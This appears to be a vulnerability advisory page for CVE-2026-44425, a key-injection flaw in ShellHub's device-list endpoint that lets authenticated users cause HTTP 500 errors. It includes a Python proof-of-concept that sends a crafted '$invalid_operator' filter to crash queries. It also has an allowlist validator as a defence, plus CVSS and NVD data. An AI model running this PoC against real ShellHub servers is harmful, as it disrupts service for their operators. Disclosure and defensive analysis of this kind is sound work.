Security Vulnerability Report
CVE-2026-44425 CVSS 5.4 MEDIUM

CVE-2026-44425

Published: 2026-05-13 22:16:44
Last Modified: 2026-05-14 16:44:56

Description

ShellHub is a centralized SSH gateway. Prior to 0.24.2, the device list endpoint accepts user-controlled identifiers in the name field of each filter property in the base64-encoded filter query parameter and in the sort_by query parameter, which are then passed directly as BSON/SQL keys in the database layer without validation. Any authenticated user can craft payloads that cause the aggregation / query to fail and the API to return HTTP 500 with no body, with no rate limiting applied. This vulnerability is fixed in 0.24.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

ShellHub < 0.24.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import base64
import json


def exploit_shellhub_dos(target_url, token):
    """
    PoC for CVE-2026-44425
    Exploits the lack of validation in the 'filter' parameter.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # Malicious payload targeting the BSON key injection
    # Injecting a '$' into a key name often causes parsing issues if not validated
    malicious_payload = {
        "name": "$invalid_operator"
    }
    # Encode payload to base64 as required by the API
    encoded_payload = base64.b64encode(json.dumps(malicious_payload).encode()).decode()
    params = {
        "filter": encoded_payload
    }
    try:
        print(f"[+] Sending malicious request to {target_url}/api/devices...")
        response = requests.get(f"{target_url}/api/devices", headers=headers, params=params)
        if response.status_code == 500:
            print("[+] Exploit successful! Server returned HTTP 500 (Internal Server Error).")
            print("[+] The service is likely experiencing a Denial of Service.")
        else:
            print(f"[-] Exploit failed. Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target and token
    TARGET = "http://localhost:8080"
    TOKEN = "valid_user_token"
    exploit_shellhub_dos(TARGET, TOKEN)
```
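As an added, defender-side illustration (not code from this page or from the ShellHub project): a request-layer validator that decodes the base64 filter parameter and checks every property name, and the sort_by value, against an allowlist before anything reaches the database layer, so a key such as the "$invalid_operator" used in the PoC is rejected with a client error instead of an unhandled HTTP 500. The field names in ALLOWED_FIELDS, the encode_filter helper and the list-of-objects filter shape are assumptions made for the example.

```python
import base64
import json
import re

# Assumed allowlist of device fields a client may filter or sort on;
# the real ShellHub field set is not given on the page.
ALLOWED_FIELDS = {"name", "status", "online", "last_seen", "info.id"}
# A plain dotted identifier: no "$", no empty segments, no whitespace.
_KEY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*$")


class InvalidFilter(ValueError):
    """Client error that should map to HTTP 400 and never reach the DB layer."""


def validate_key(key):
    """Accept a key only if it is syntactically plain and on the allowlist."""
    if not isinstance(key, str) or not _KEY_RE.match(key):
        raise InvalidFilter(f"malformed field name: {key!r}")
    if key not in ALLOWED_FIELDS:
        raise InvalidFilter(f"unknown field: {key!r}")
    return key


def encode_filter(props):
    """Build the base64 'filter' value the way a client would (assumed helper)."""
    return base64.b64encode(json.dumps(props).encode()).decode()


def parse_filter_param(encoded):
    """Decode the base64 'filter' parameter and validate every property's name.

    Assumes a JSON list of objects, each with a "name" (a single object is
    accepted too, as in the PoC). Returns the validated names in order.
    """
    try:
        props = json.loads(base64.b64decode(encoded, validate=True))
    except ValueError as exc:  # bad base64 (binascii.Error) or bad JSON
        raise InvalidFilter(f"filter is not base64-encoded JSON: {exc}") from exc
    if isinstance(props, dict):
        props = [props]
    if not isinstance(props, list):
        raise InvalidFilter("filter must be a JSON list of properties")
    return [validate_key(p.get("name") if isinstance(p, dict) else None) for p in props]


def validate_sort_by(sort_by):
    """sort_by uses the same allowlist; an empty value means the server default."""
    return validate_key(sort_by) if sort_by else None
```

Mapping InvalidFilter to a 400 response keeps malformed keys out of the aggregation pipeline; per-user rate limiting on the endpoint is a separate control the advisory notes is absent.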

References

https://github.com/shellhub-io/shellhub/security/advisories/GHSA-47r2-v3x6-wff9

Weaknesses (CWE)

CWE-20, CWE-943, CWE-1333

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44425",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T22:16:44.400",
    "lastModified": "2026-05-14T16:44:55.820",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ShellHub is a centralized SSH gateway. Prior to 0.24.2, the device list endpoint accepts user-controlled identifiers in the the name field of each filter property in the base64-encoded filter query parameter and the sort_by query parameter, which are then passed directly as BSON/SQL keys in the database layer without validation. Any authenticated user can craft payloads that cause the aggregation / query to fail and the API to return HTTP 500 with no body, with no rate limiting applied. This vulnerability is fixed in 0.24.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-20"},
          {"lang": "en", "value": "CWE-943"},
          {"lang": "en", "value": "CWE-1333"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-47r2-v3x6-wff9",
        "source": "[email protected]"
      }
    ]
  }
}
```